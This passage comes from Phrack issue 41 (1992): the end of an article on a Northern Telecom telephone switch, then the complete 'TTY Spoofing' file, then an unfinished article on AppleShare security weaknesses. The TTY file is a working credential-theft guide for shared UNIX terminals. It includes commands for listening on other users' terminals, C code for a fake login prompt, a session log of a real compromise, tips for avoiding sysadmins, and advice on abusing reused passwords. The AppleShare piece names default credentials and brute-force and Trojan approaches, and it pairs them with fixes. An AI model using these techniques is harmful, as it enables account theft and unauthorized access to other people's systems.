  3594. TRK         Trunks
  3595.  
  3596.             DTRK - Digital Trunks
  3597.             TRK  - Analog or digital recorded announcement trunks
  3598.  
  3599. TRNS        Translations
  3600.  
  3601.             ADDR - Address translations
  3602.             EBSP - EBS prefix translations
  3603.             ESAP - Emergency Stand-Alone prefix
  3604.             PRFX - Prefix translations
  3605.             SCRN - Screening translations
  3606.  
  3607.  
  3608. V. SPEC SHEET
  3609.  
  3610. Maximum # Subscriber Lines:            10,800
  3611.      (in stand-alone mode)
  3612.  
  3613. Maximum # Trunks:                       3,408
  3614.      - Incoming Trunk Groups:             127
  3615.      - Outgoing Trunk Groups:             127
  3616.      - Two-way Trunk Groups:              127
  3617.      - Maximum Routes:                    512
  3618.      - Maximum Trunks per Group:          255
  3619.  
  3620. Directory Numbers:                     16,000
  3621.  
  3622. Office Codes:                               8
  3623.  
  3624. Home Numbering Plan Area:                   4
  3625.  
  3626. Thousands Groups:                          64
  3627.  
  3628. Number of Network Groups:              1 or 2
  3629.  
  3630. Total Network Capacity:
  3631.     - One Network Module:               5,400 POTS lines + 600 trunks
  3632.     - Two Network Module:              10,800 POTS lines + 1,200 trunks
  3633.  
  3634. Traffic
  3635.      - Busy Hour Calls                 38,000
  3636.      - Average Busy Season             29,000
  3637.          Busy Hour Attempts
  3638.      - CCS per line                      5.18 centi call seconds
  3639.      - CCS per trunk                     27.0 centi call seconds
  3640.      - Total CCS                      133,000 centi call seconds
  3641.  
  3642. Outpulsing                    DP, MF, or DTMF
  3643.  
  3644. Inpulsing
  3645.      - Trunks                 DP, MF, or DTMF
  3646.      - Lines                       DP or DTMF
  3647.  
  3648. Register Capacity
  3649.      - Outgoing                  DP=16 digits
  3650.                                DTMF=16 digits
  3651.                                  MF=14 digits+KP+ST
  3652.                             LEAS MF=20 digits+KP+ST
  3653.                              [LEAS Route Access]
  3654.  
  3655.      - Incoming                  DP=14 digits
  3656.                                DTMF=16 digits
  3657.                                  MF=14 digits
  3658.  
  3659.  
  3660. VI. LIMITED GLOSSARY
  3661.  
  3662. DP - Dial Pulse.  A form of signaling that transmits pulse trains to indicate
  3663.      digits.  Slow compared to DTMF and MF.  Made obsolete by DTMF.  Old
  3664.      step-by-step switches use this method, and there are still quite a few
  3665.      subscriber lines that use DP, even though DTMF is available.
  3666.  
  3667. In-band Signaling - Transmitting control signals in the 300 - 3300 hz voice
  3668.                     band, meaning that they're audible to subscribers.
  3669.  
  3670. Out-of-band Signaling - Transmitting control signals above or below the 300 -
  3671.                         3300 hz voice band.  See SS7, CCS7.
  3672.  
  3673. DTMF - Dual Tone Multi-Frequency.  A form of in-band signaling that transmits
  3674.        two tones simultaneously to indicate a digit.  One tone indicates the
  3675.        row and the other indicates a column.  A fast, technically simple way of
  3676.        dialing that is in use almost all over the United States.  White boxes
  3677.        generate DTMF tones, a.k.a. "Touch Tones" or Digitones.  See DP, MF.
  3678.  
  3679. MF - Multi-frequency.  A form of in-band signaling similar to DTMF, except the
  3680.      signals are encoded differently (i.e., the row and column tones are
  3681.      different, because the keypad for MF tones isn't laid out in a rectangular
  3682.      matrix).  These are the "operator tones."  Blue boxes generate these
  3683.      tones. See DTMF, In-band signaling.
  3684.  
  3685. CCS7 - Common Channel Signaling 7.  Part of the Signaling System 7
  3686.        specification, CCS7 transmits control signals either above or below the
  3687.        voice band to control switch equipment, so control signals may be
  3688.        transmitted simultaneously with voice.  See SS7.
  3689.  
  3690. SS7 - Signaling System 7.  An inter-switch signaling protocol developed by
  3691.       Bellcore, the RBOCs' research consortium.  Relatively new, this protocol
  3692.       can be run only on digital switches. See CCS7, CLASS.
  3693.  
  3694. CLASS - Custom Local Area Signaling Services.  Several subscriber-line features
  3695.         that are just being introduced around the United States at the time of
  3696.         this article.  See SS7, CCS7.
  3697.  
  3698. Centrex - A scheme that turns a switch into an off-site PBX for business users.
  3699.           It can usually co-exist with existing lines.
  3700.  
  3701.  
  3702. If anyone has any more questions, contact me at WWIVNet THE CAVALIER@3464.
  3703.  
  3704. Thanks to Northern Telecom (the nicest sales staff in the world of switch
  3705. manufacturers, with a killer product to boot!), Pink Flamingo, Taran King,
  3706. Grim, and the crew who supported the NFX in "days of yore."
  3707. _______________________________________________________________________________
  3708.  
  3709.                                 ==Phrack Inc.==
  3710.  
  3711.                    Volume Four, Issue Forty-One, File 8 of 13
  3712.  
  3713.                           ++++++++++++++++++++++++++++
  3714.                     +++++++                          +++++++
  3715.                     +++++++       TTY SPOOFING       +++++++
  3716.                     +++++++                          +++++++
  3717.                      ++++++            BY            ++++++
  3718.                       +++++                          +++++
  3719.                         +++         VaxBuster        +++
  3720.                          ++                          ++
  3721.                           ++++++++++++++++++++++++++++
  3722.  
  3723.                                  July 16, 1992
  3724.  
  3725.  
  3726.      Please note that this file is ONLY to be distributed as part of Phrack,
  3727. and will NOT be distributed to any other person or magazine for release.
  3728.  
  3729.      More detailed instructions have been provided so that the novice hacker is
  3730. able to understand them; therefore, all experienced hackers should be able to
  3731. breeze right through this without having to worry about the specific command
  3732. syntax provided.
  3733.  
  3734.      On UNIX systems, there are many ways to obtain account names and
  3735. passwords.  Some hackers prefer to swipe the password file and run programs
  3736. like Crack and Killer Cracker on them in order to get account names and
  3737. passwords.  Others rely on bugs or holes in the system in order to gain root
  3738. access.  Both these methods work, but what do you do if your password file is
  3739. shadowed (and it is NOT a yellow pages file!)?  And what do you do if all the
  3740. holes have been patched over from years of previous hackers abusing them? Well,
  3741. I happen to have found a system where all this is true.  I have even allowed
  3742. hackers to use one of my accounts to try to gain root privs, and of the 10 or
  3743. so that have tried, they have all failed.  My only recourse was to find SOME
  3744. other way to get accounts on the system to maintain MY security.
  3745.  
  3746.      TTY spoofing is often looked at as being lame, and some don't even
  3747. consider it a "hacking technique."  People usually completely overlook it, and
  3748. many others don't even know about it, or know HOW to do it.  I suppose I should
  3749. start out by defining the term.  TTY spoofing is either installing a Trojan
  3750. horse type program to sit and watch a certain (or multiple) tty and wait for a
  3751. user to login.  Instead of getting the normal system prompt, the program YOU
  3752. installed echoes the standard "login:" prompt, and then after they type in
  3753. their username, it prompts them for "<username> password:" and boom, you have a
  3754. new account.  This can be done by a program or, in many cases, manually.
  3755.  
  3756.      Of all the people I know, 90 percent of them scream at me saying that this
  3757. is impossible because their system doesn't allow read/write access to the tty.
  3758. When I make references to tty, I mean the physical device filename or
  3759. /dev/ttyxx where xx is either numeric, alphabetic, or alphanumeric characters
  3760. (e.g., 03, pa, p4 are all valid).  Of all the systems I've been on, I've never
  3761. seen one that doesn't allow reading/writing to a LOGIN process.  See, the
  3762. system doesn't change the tty to owner r/w ONLY until AFTER HIS USERNAME AND
  3763. PASSWORD HAS BEEN VERIFIED.  Console, or ttyco, is an exception where the perms
  3764. are ALWAYS -rw------.
  3765.  
  3766.      Now that you know WHAT tty spoofing is and the general idea behind WHY it
  3767. works, I'll start to tell you the many ways it can be done.
  3768.  
  3769.      In order to tty spoof, you MUST have at least ONE valid account on the
  3770. system.  You can obtain the account via a little social engineering, or you
  3771. could try a /who *sitename in the IRC to get nicknames and use their username
  3772. and try to hack out the password.  Try looking for users in #hottub and other
  3773. st00pid channels because they are the ones who would tend to have the easy
  3774. passwords.  Or use any other method that you can think of to obtain an account.
  3775.  
  3776.      Once you have an account, the rest is the easy part.  Simply create a
  3777. script in vi or emacs that redirects input from UNUSED tty's to cat.  Since you
  3778. are cat's standard output, everything coming FROM the monitored tty will come
  3779. to your screen.  You probably want to watch about 10 or 15 terminals.  An
  3780. example script would be:
  3781. cat </dev/tty01&
  3782. cat </dev/tty02&
  3783. cat </dev/ttypa&
  3784. cat </dev/ttyp1&
  3785.  
  3786.      Then you want to just run your script with source.  Once a user walks up
  3787. to a terminal (or remotely logs in via telnet, etc.), they will try to press
  3788. return and attempt to get a login prompt.  Many users will also type their
  3789. username, thinking that the system is just waiting for it.  Make sure you write
  3790. down the username.  After a while, they will probably start pressing control
  3791. characters, like control-d or z or whatever.  Here's the problem:  when CAT
  3792. encounters the ^D, it thinks that it is receiving an EOF in the file and it
  3793. thinks its job is done.  You'll get something to the effect of:
  3794.  
  3795. [2] Exit           DONE                        cat </dev/tty01
  3796.  
  3797. or
  3798.  
  3799. [2] Exit 1         cat:i/o error               cat </dev/tty01
  3800.  
  3801. You want to IMMEDIATELY (if not sooner) "recat" that terminal.  Once you get
  3802. that DONE signal, you now know WHAT terminal is active.  You want to then type
  3803. something to the effect of 'echo -n "login:" >/dev/tty01&'.  The & is important
  3804. because if the user decided to switch terminals, echo could lock up and freeze
  3805. your control on the account.  If after about 10 seconds echo doesn't come back
  3806. as:
  3807.  
  3808. [5] Exit            DONE                        echo -n login: >/dev/tty01
  3809.  
  3810. KILL the process.  When you ran the echo command, the shell gave you a
  3811. processid.  Just type KILL processid.  If the done echo line DOES come back,
  3812. that means that it was successfully printed on the user's screen.  He will then
  3813. type in his username.  WRITE THIS DOWN.  If you are ever in doubt that the word
  3814. on your screen is a username, type 'grep word /etc/passwd' and if a line comes
  3815. up, you know it's valid.  If grep doesn't return anything, still keep it
  3816. because it might be a password.  Then wait about 2 seconds, and type
  3817. 'echo -n "<username> password:" >/dev/tty01&' again using the & to prevent
  3818. lockage.  If that command doesn't come back in about 10 seconds, kill the
  3819. process off and you can assume that you lost the user (e.g. he moved to another
  3820. terminal).  If the done echo line DOES come back, then in about 2 seconds, you
  3821. SHOULD see his password come up.  If you do, write it down, and boom, you have
  3822. a new account.
  3823.  
  3824.      This may seem like a time consuming process and a lot of work, but
  3825. considering that if you have macros with the "cat </dev/tty" command and the
  3826. echo -n commands preset, it will be a breeze.  Okay - so you say to yourself,
  3827. "I'm a lazy shit, and just want passwords to be handed to me on a silver
  3828. platter."  With a little bit of work, you can do that!  Below is a few lines of
  3829. C source code that can be used to automate this process.  Anyone who knows C
  3830. should be able to put something together in no time.
  3831.  
  3832. #include <stdio.h>
  3833.  
  3834. FILE *fp, *fp2;
  3835. char username[10], password[10];
  3836.  
  3837. main()
  3838. {
  3839.       fp=fopen("/dev/ttyp1", "r");
  3840.       fp2=fopen("/dev/ttyp1", "w");
  3841.  
  3842.       fprintf(fp2, "login:");
  3843.       fscanf(fp, "%s", &username);
  3844.  
  3845.       /* Put delay commands in here */
  3846.  
  3847.       fprintf(fp2, "%s password:", username);
  3848.       fscanf(fp, "%s", @password);
  3849.  
  3850.       printf("Your new account info is %s, with password %s.", username,
  3851.                 password);
  3852. }
  3853.  
  3854.      This is a VERY basic setup.  One could fairly easily have the program take
  3855. arguments from the command line, like a range of tty's, and have the output
  3856. sent to a file.
  3857.  
  3858.      Below is an actual session of manual tty spoofing.  The usernames and
  3859. passwords HAVE been changed because they will probably be active when you read
  3860. this.  Some c/r's and l/f's have been cut to save space.  Please notice the
  3861. time between the startup and getting a new account is only seven minutes.
  3862. Using this technique does not limit the hacked passwords to dictionary
  3863. derivatives like Crack and other programs.
  3864.  
  3865. source mycats                              ; This file contains cats
  3866.                                     ; for terminals tty03 - tty10
  3867. [1] 29377
  3868. /dev/tty03: Permission denied       ; All this means is that someone is logged
  3869. in
  3870.                                 ; and has their mesg set to NO.  Ignore it.
  3871.  
  3872. [1]    Exit 1               cat < /dev/tty03
  3873. [2] 29378
  3874. [3] 29379
  3875. /dev/tty06: Permission denied
  3876. /dev/tty05: Permission denied
  3877. [4]    Exit 1               cat < /dev/tty06
  3878. [3]    Exit 1               cat < /dev/tty05
  3879. /dev/tty07: Permission denied
  3880. [3]    Exit 1               cat < /dev/tty07
  3881. /dev/tty08: Permission denied
  3882. [3]    Exit 1               cat < /dev/tty08
  3883. [2]  + Stopped (tty input)    cat < /dev/tty04      ;This was the terminal I
  3884. was
  3885.                                                 ;on - it's automatically
  3886.                                     ;aborted...
  3887. [3] 29383
  3888. <5:34pm><~> /dev/tty09: Permission denied
  3889. [3]    Exit 1               cat < /dev/tty09
  3890. <5:34pm><~> source mycats2                  ;This one contains 34 - 43
  3891.  
  3892. [3] 29393
  3893. [4] 29394
  3894. [5] 29395
  3895. [6] 29396
  3896. [7] 29397
  3897. [8] 29398
  3898. [9] 29399
  3899. /dev/tty36: Permission denied
  3900. /dev/tty37: Permission denied
  3901. /dev/tty38: Permission denied
  3902. /dev/tty39: Permission denied
  3903. /dev/tty40: Permission denied
  3904. /dev/tty34: Permission denied
  3905. /dev/tty35: Permission denied
  3906.  
  3907. [9]    Exit 1               cat < /dev/tty40
  3908. [8]    Exit 1               cat < /dev/tty39
  3909. [7]    Exit 1               cat < /dev/tty38
  3910. [6]    Exit 1               cat < /dev/tty37
  3911. [5]    Exit 1               cat < /dev/tty36
  3912. [4]    Exit 1               cat < /dev/tty35
  3913. [3]    Exit 1               cat < /dev/tty34
  3914.  
  3915. [1] 29400
  3916. [3] 29401
  3917. [4] 29402
  3918.  
  3919. <5:34pm><~> /dev/tty41: Permission denied
  3920.  
  3921. [1]    Exit 1               cat < /dev/tty41
  3922. /dev/tty43: Permission denied
  3923. [4]    Exit 1               cat < /dev/tty43
  3924. /dev/tty42: Permission denied
  3925. [3]    Exit 1               cat < /dev/tty42
  3926.  
  3927. <5:34pm><~> source mycats3                        ;This contains p1-pa
  3928.  
  3929. [3] 29404
  3930. [4] 29405
  3931. [5] 29406
  3932. [6] 29407
  3933. [7] 29408
  3934. /dev/ttyp1: Permission denied
  3935. /dev/ttyp3: Permission denied
  3936. /dev/ttyp5: Permission denied
  3937. /dev/ttyp6: Permission denied
  3938.  
  3939. [8]    Exit 1               cat < /dev/ttyp6
  3940. [7]    Exit 1               cat < /dev/ttyp5
  3941. [5]    Exit 1               cat < /dev/ttyp3
  3942. [3]    Exit 1               cat < /dev/ttyp1
  3943. [7] 29410
  3944. [8] 29411
  3945. [9] 29412
  3946. [1] 29413
  3947.  
  3948. <5:34pm><~> /dev/ttyp7: Permission denied
  3949.  
  3950. [7]    Exit 1               cat < /dev/ttyp7
  3951. /dev/ttypa: Permission denied
  3952. [1]    Exit 1               cat < /dev/ttypa
  3953.  
  3954. <5:34pm><~> source mycats4                         ;Last one is q0-qa
  3955.  
  3956. [1] 29426
  3957. [3] 29427
  3958. [5] 29428
  3959. [7] 29429
  3960. [10] 29430
  3961. [11] 29431
  3962. /dev/ttyq5: Permission denied
  3963.  
  3964. [10]   Exit 1               cat < /dev/ttyq5
  3965. [12] 29432
  3966. [10] 29433
  3967. [13] 29434
  3968. [14] 29435
  3969. <5:34pm><~> who
  3970.  
  3971. <5:34pm><~> nnnnnnnnrlogin unx        ; He thought he didn't type it right.
  3972. pigsnort                                ; Important!  Write down ALL non-
  3973.                               ; system sent messages!
  3974. <5:35pm><~>
  3975. grep pigsnort /etc/passwd               ; Check with grep to see if it's an
  3976.                               ; account.
  3977.  
  3978. <5:35pm><~>                             ; Didn't return anything - must be a
  3979.                               ; a password!
  3980.  
  3981. nnnpptst8                               ; Sure looks like an account name to
  3982. nnnnn=====                              ; me!  Write it down!
  3983.  
  3984. ls
  3985.  
  3986. [8]    Done                   cat < /dev/ttyp8  ; Asshole pressed control-d.
  3987.                                     ; 'recat' the terminal!
  3988.  
  3989. <5:36pm><~> cat  < /d e v/  ttyp8&             ; This is the 'recat.'
  3990.  
  3991. [8] 29459
  3992. <5:36pm><~> cat: read error: I/O error            ; Asshole is now trying all
  3993.                                     ; sorts of control characters
  3994.                                     ; sending UNIX into a fit.
  3995. [4]    Exit 1               cat < /dev/ttyp2
  3996.  
  3997. <5:36pm><~> cat </dev/ttyp2&                  ; 'recat' it!
  3998.  
  3999. [4] 29465
  4000. <5:36pm><~>
  4001.  
  4002. <5:36pm><~>
  4003.  
  4004. [6]    Done                   cat < /dev/ttyp4  ; Someone had to press the
  4005.                                                 ; character, so this is active.
  4006.  
  4007. <5:36pm><~> cat </dev/ttyp4&                  ; 'recat' the ctrl-d.
  4008.  
  4009. [6] 29468
  4010. <5:36pm><~> echo -n "login:" >/dev/ttyble1      ; Try echo'ing a fake login
  4011. cat: read error: I/O error                  ; to the active terminal.
  4012.  
  4013. [6]    Exit 1               cat < /dev/ttyp4
  4014. poop4d                                          ; Here goes another password.
  4015. p4                                              ; Couldn't find the matching
  4016. &                                    ; account.
  4017.  
  4018. [6] 29470
  4019. <5:37pm><~> cat: read error: I/O error
  4020.  
  4021.  
  4022. [4]    Exit 1               cat < /dev/ttyp2
  4023.  
  4024.  
  4025. <5:37pm><~> cat </dev/ttyp2&
  4026.  
  4027. [4] 29489
  4028. <5:37pm><~> echo -n "login:" >/dev/ttyp2&      ; Try echo'ing a fake login
  4029.                                     ; prompt again.
  4030. [15] 29490
  4031. <5:37pm><~> kill 29490                        ; Login prompt didn't return
  4032.                                     ; within a few seconds so we
  4033.                                                 ; kill it.
  4034.  
  4035. [15]   Terminated             echo -n login: > /dev/ttyp2
  4036. <5:37pm><~> cat </dev/tty
  4037. echo -n "login:" >/dev/ttyp4&
  4038.  
  4039. [15] 29491
  4040. <5:38pm><~> kill 29491
  4041.  
  4042. <5:38pm><~> grep pptst8 /etc/passwd             ; Make sure it's an account!
  4043.  
  4044. pptst8:X:58479:4129:People Eater:/ucuc.edu/usr/pptst8:/bin/bash
  4045. <5:38pm><~> grep ble1 /etc/passwd               ; This isn't an account...
  4046.  
  4047. <5:39pm><~> grep poop4d /etc/passwd             ; Neither is this - probably
  4048.                                     ; a password...
  4049.  
  4050. <5:39pm><~> who                              ; See if any of the users we
  4051.                                     ; caught fell through an
  4052.                                     ; 'uncatted' terminal...
  4053.  
  4054. <5:39pm><~> ps -x                               ; View all our processes.
  4055.                                     ; DAMN glad that the cat's
  4056.   PID TT STAT  TIME COMMAND                     ; don't come up in the process
  4057. 29266 04 S     0:04 -tcsh (tcsh)            ; list!
  4058. 29378 04 T     0:00 cat
  4059. 29412 04 I     0:00 -tcsh (tcsh)
  4060. 29426 04 I     0:00 -tcsh (tcsh)
  4061. 29427 04 I     0:00 -tcsh (tcsh)
  4062. 29428 04 I     0:00 -tcsh (tcsh)
  4063. 29429 04 I     0:00 -tcsh (tcsh)
  4064. 29431 04 I     0:00 -tcsh (tcsh)
  4065. 29432 04 I     0:00 -tcsh (tcsh)
  4066. 29433 04 I     0:00 -tcsh (tcsh)
  4067. 29434 04 I     0:00 -tcsh (tcsh)
  4068. 29435 04 I     0:00 -tcsh (tcsh)
  4069. 29459 04 I     0:00 -tcsh (tcsh)
  4070. 29470 04 D     0:00 <exiting>
  4071. 29489 04 I     0:00 -tcsh (tcsh)
  4072. 29491 04 D     0:00 -tcsh (tcsh)
  4073. 29547 04 R     0:00 ps -x
  4074. <5:40pm><~> kill 29378 29412 29426 29427 29428 29429 29431 29432 29433 29434 29
  4075.  
  4076. 435 29459 29470 29489 289491                    ;Kill off all processes.
  4077.  
  4078. 29470: No such process
  4079.  
  4080. [4]    Terminated             cat < /dev/ttyp2
  4081. [8]    Terminated             cat < /dev/ttyp8
  4082. [14]   Terminated             cat < /dev/ttyqa
  4083. [13]   Terminated             cat < /dev/ttyq9
  4084. [10]   Terminated             cat < /dev/ttyq8
  4085. [12]   Terminated             cat < /dev/ttyq7
  4086. [11]   Terminated             cat < /dev/ttyq6
  4087. [7]    Terminated             cat < /dev/ttyq4
  4088. [5]    Terminated             cat < /dev/ttyq3
  4089. [3]    Terminated             cat < /dev/ttyq2
  4090. [1]    Terminated             cat < /dev/ttyq1
  4091. [9]    Terminated             cat < /dev/ttyp9
  4092. [2]    Terminated             cat < /dev/tty04
  4093.  
  4094. <5:41pm><~>
  4095.  
  4096. [15]   Terminated             echo -n login: > /dev/ttyp4
  4097. [6]    Done                   echo -n login: > /dev/ttyp4
  4098.  
  4099. <5:41pm><~> ps -x
  4100.  
  4101.   PID TT STAT  TIME COMMAND
  4102. 29266 04 S     0:04 -tcsh (tcsh)
  4103. 29594 04 R     0:00 ps -x
  4104. <5:41pm><~> logout
  4105.  
  4106. Local -011- Session 1 disconnected from UNIX1
  4107.  
  4108. Local> c unx                                    ; Notice it's a different
  4109.                                                 ; system but shares passwords.
  4110. Local -010- Session 1 to UNX on node MYUNX established
  4111.  
  4112. Welcome to ucuc.edu.
  4113.  
  4114. login: ble1                                     ; Test out all the accounts
  4115. ble1 password:  [I tried poop4d]                ; with all the passwords.
  4116. Login failed.
  4117. login: pptst8
  4118. pptst8 password: [I tried poop4d here too.]
  4119. Login failed.
  4120. login: pptst8
  4121. pptst8 password: [I typed pigsnort]
  4122. Authenticated via AFS Kerberos.                 ; BINGO!  We're in!
  4123. Checking system rights for <pptst8>... login permitted.
  4124. login 1.0(2), Authen
  4125. Last login: Fri Jul 17 17:33:30 on tty11
  4126.  
  4127. (1) unix $ ls                                   ; Let's see what this sucker
  4128.                                                 ; has...hmm...an IRC user, eh?
  4129. Mail      Mailbox      News      bin      irc      other      junk      private
  4130. public
  4131. (2) unix $ logout
  4132.  
  4133. Local -011- Session 1 disconnected from UNX
  4134.  
  4135.      A few words of advice:  Monitor the tty's when it's the busiest time of
  4136. the day, usually about 11am on a university system.  Kill all your processes
  4137. before you hang up.  Those processes that you run will sit on the system and
  4138. can be found by sysadmins.  Also, they will tie up those tty's that you are
  4139. monitoring, which can also cause problems.  Point is, you DON'T want to attract
  4140. attention to what you're doing.  Don't test the accounts you get immediately.
  4141. If the victim happens to be doing a 'who' and sees two of himself, he is going
  4142. to shit.  Wait until later or use a different subsystem that won't show up on
  4143. his 'who'.
  4144.  
  4145. Don't take over accounts.  All the real user has to do is call up the office
  4146. and tell them that their password was changed.  In two seconds, it'll be
  4147. changed back, plus the sysadmin will be on the lookout so you're just one step
  4148. BEHIND where you started.  Once you have someone's account info, kill the cat
  4149. that is sucking the terminal so that the user can log in normally.  If he
  4150. continues not to get ANYTHING, he may go and solicit some "professional" help,
  4151. and THEY might know what's going on, so let the sucker log in.  Another thing:
  4152. with accounts you get.
  4153.  
  4154. DO NOT DESTROY ANYTHING in the system, not in their account, and no where else
  4155. if you get higher privs.  Chances are that the person is NOT going to know
  4156. someone has obtained their password, and will have NO reason to change it.
  4157. Wait until his college term/semester ends and then monitor the file dates.  If
  4158. after about a month the dates don't change, change the password and do whatever
  4159. you want to the account because he's probably done with it.
  4160.  
  4161. Oh and one last thing.  Once you have a valid account, grep the username and
  4162. get the REAL name.  Then grep the REAL name and find out all accounts on the
  4163. system that the guy owns.  Chances are that he is using the same password in
  4164. multiple accounts!
  4165.  
  4166. Thanks go to Pointman, #hack members, and the entire current/past Phrack staff
  4167. for putting out an excellent magazine over the years.
  4168.  
  4169. If you need to contact me, try the IRC in #hack and the VMB world.  I usually
  4170. prefer NOT to be contacted by e-mail, but if you have my address and have an
  4171. important question, go for it.  I'm willing to help any beginners who need it.
  4172.  
  4173. Happy Hacking!
  4174.  
  4175. VaxBuster '92
  4176. _______________________________________________________________________________
  4177.  
  4178.                                 ==Phrack Inc.==
  4179.  
  4180.                    Volume Four, Issue Forty-One, File 9 of 13
  4181.  
  4182. - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -
  4183.  
  4184.                   Security Shortcomings of AppleShare Networks
  4185.  
  4186.                                  By Bobby Zero
  4187.  
  4188.                                November 28, 1992
  4189.  
  4190. - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = -
  4191.  
  4192.         The purpose of this file is to inform all those underpaid Mac network
  4193. administrators or other interested parties of the problems with Macintosh
  4194. AppleShare and how to address those problems.  AppleShare is quite respectable
  4195. in both its implementation and usage, blending seamlessly with the Macintosh OS
  4196. such that the casual user has no idea of the complexity behind the elegance.
  4197. For all its elegance, however, it does have some severe drawbacks in terms of
  4198. security-- nearly all of which are fixable, requiring a combination of common
  4199. sense and RTFM:  Read The Fucking Manual.
  4200.  
  4201.         This is in no way to be considered as a "How To" for persons of
  4202. questionable ethics and/or motives.  That being said, however, I feel the
  4203. following is in order:
  4204.  
  4205. PROSECUTOR:  [To WITNESS] ...And you are?
  4206.  
  4207. WITNESS:  Miss America.
  4208.  
  4209. [Singing]
  4210.  
  4211. PROSECUTOR:  Would you please tell the court why you feel Fielding Mellish is a
  4212. traitor to this country?
  4213.  
  4214. WITNESS:  I feel that Fielding Mellish is a traitor to this country because his
  4215. views are different from the views of the President, and others of his kind.
  4216. Differences of views should be tolerated, but not when they are too different.
  4217. Then he becomes a subversive mother.
  4218.  
  4219.                                       -- Woody Allen, "Bananas"
  4220.  
  4221.  
  4222.         This file is divided into 5 sections:  (1) the "AppleShare Prep" file,
  4223. (2) the "AShare File Srv" application, (3) Mixing VAXens & AppleShare, (4)
  4224. System 7 FileSharing, and (5) NCSA Telnet weaknesses. The fifth does not
  4225. particularly relate to AppleShare, but its security can be exploited via method
  4226. #4, so I thought to include it.
  4227.         If there is sufficient interest, I will make a "Part II" [or three or
  4228. four or five..] detailing more problems.  Send feedback to Phrack Loopback;
  4229. being a regular reader, I will respond accordingly.  While writing this, I was
  4230. unsure of the approach -- either bland technical or "gh0d-these-people-
  4231. are-dumb" statements.  I decided to just combine them, chao-like.  Well, enough
  4232. of my rambling.  On with the file!
  4233.  
  4234.  
  4235.                                - = - = - = - = -
  4236.  
  4237.  
  4238. THE "APPLESHARE PREP" FILE
  4239. ~~~  ~~~~~~~~~~ ~~~~  ~~~~
  4240. (1) The "AppleShare Prep" file under both System 6 and 7 contains a BMLS
  4241. resource; this resource contains various information required to mount a volume
  4242. on startup.  While this is an optional feature, many people choose it either by
  4243. accident or for convenience.
  4244.  
  4245. * The downside to this convenience is the fact that the user's name and
  4246. password for a server are stored in this file.  Anyone with a copy of ResEdit
  4247. can open this file up, and view the BMLS resource.
  4248.  
  4249. * It's so easy to create a Trojan horse and slip it into a program or Hypercard
  4250. stack to copy the BMLS resource from the target's AppleShare Prep file and copy
  4251. it into a hidden file on the server drive where it can be retrieved at a later
  4252. date.  If Mr. Ed is well-written, he would be nearly undetectable as it takes
  4253. but an eyeblink to copy the rez.  Trojan horses aren't as sexy as viruses and
  4254. don't get much publicity, but it is exceedingly easy to fool a Macintosh user
  4255. [or any user, for that matter] into running something he or she shouldn't.
  4256.  
  4257. HOW TO SOLVE:  Educate users of this flaw and urge them to log into the file
  4258. server manually.  If computers in an open lab setting are used, configure them
  4259. to automatically log in as a guest, thereby circumventing the entire issue of
  4260. passwords entirely.  Encryption of the BMLS resource is entirely up to Apple or
  4261. someone with enough knowledge of AppleShare to write a patch -- certainly not
  4262. me [yet...].
  4263.  
  4264.  
  4265. THE "ASHARE FILE SRV" SERVER
  4266. ~~~  ~~~~~~ ~~~~ ~~~  ~~~~~~
  4267. (2) On AppleShare File Servers running v2.0:
  4268.  
  4269. * The file "Users & Groups" within the Server/System Folder contains the data
  4270. required for maintaining folder privileges & ownership.  It also contains
  4271. user's names and passwords, in an unencrypted format.  While obtaining this
  4272. file would be somewhat difficult [one must physically be able to access the
  4273. server:  shut it down, restart it with a floppy, copy the file, reboot the
  4274. machine], the "rewards" would be considerably worthwhile, as one would now have
  4275. a copy of every user name and password, including that of the Administrator.
  4276. Once physical access is secured, one could conceivably write a program to
  4277. install on the server that would periodically make a copy of the file and put
  4278. it on the "server" side of the disk, and give it an innocuous name... an INIT
  4279. which would perform on every startup, or install a Time Task to do it daily, or
  4280. even going so far as to patch the AppleShare Admin program to update this file
  4281. every time a user is added or modified.  It is also common knowledge that users
  4282. use the same passwords on different machines; armed with a list of names &
  4283. passwords for one machine, one could then enter another computer with the same
  4284. user/pass combination.
  4285.  
  4286. * There is no automatic lockout for users who enter an incorrect password. With
  4287. a bit o' knowledge and a copy of "Inside AppleTalk," a program could be written
  4288. that could use a dictionary of common passwords in conjunction with a list of
  4289. user names to try to manually "hack out" a valid user/password combination.
  4290. The speed of this varies greatly on the speed of and load on the server, the
  4291. speed of and load on the network, and the speed of the "attacking" computer.  A
  4292. typical "hack" can take anywhere from .5 to 5 seconds, but there is no need to
  4293. tie up the attacking computer for that period of time; the program can use both
  4294. asynchronous AFPCommand calls and exist under Multifinder to allow for complete
  4295. "background hacking."  It should be noted, however, that Apple has incorporated
  4296. a lockout into the hideously overpriced AppleShare 3.0 -- its hardware
  4297. requirements, however, seem to leave it out of the budgets of most sane
  4298. individuals.
  4299.  
  4300. * A group of individuals armed with the above program could go into a computer
  4301. lab, fire up said program, and then launch a word processing application and
  4302. seem to be doing homework while in reality they would be hacking passwords.
  4303.  
  4304. * The "Copy Protect File" in AppleShare Admin disallows using the Finder to
  4305. copy a "Protected" program.  That does not deter, however, a "normal" copy
  4306. program such as DiskTop from copying the file.  [That is about as lame as the
  4307. ol' "Bozo Bit."]
  4308.  
  4309. HOW TO SOLVE:  Insure that physical access to the fileserver is impossible for
  4310. all but trusted persons.  Upgrade to AppleShare 3.0 [$$ gag $$], which allows
  4311. "locking" of accounts after a certain number of bad attempts, or obtain a
  4312. logging program to keep track of invalid attempts and origins, then track down
  4313. the offenders.  There's no way to stop the violation of the "Copy Protection"
  4314. -- it deters only those easily dismayed.  All I can suggest is you keep your
  4315. non-PD programs away from Guests or other "non-trusted" persons.
  4316.  
  4317.  
  4318. VAXSHARE, PCLINK, AND OTHER VAX/APPLESHARE SERVER APPS
  4319. ~~~~~~~~~ ~~~~~~~ ~~~ ~~~~~ ~~~ ~~~~~~~~~~ ~~~~~~ ~~~~
  4320. (3) There are various forms of AppleShare that can be run from a VAX; many
  4321. versions of these programs have severe flaws which can also be exploited.
  4322.  
  4323. * The prime example is the existence of "default" accounts:  while "Guest"
  4324. logins might be disallowed, logging in as DEFAULT, password USER has been known
  4325. to be effective in "getting in" -- even FIELD, SERVICE has worked.  Pathetic,
  4326. isn't it, that these guys haven't picked up on these things?
  4327.  
  4328. * The existence of a VAXShare [or similar] account used for AppleShare access
  4329. can oft times be used to access the VAX.  For instance, if one is aware that a
  4330. VAX is being used in an open lab as an AppleShare File Server, one can use
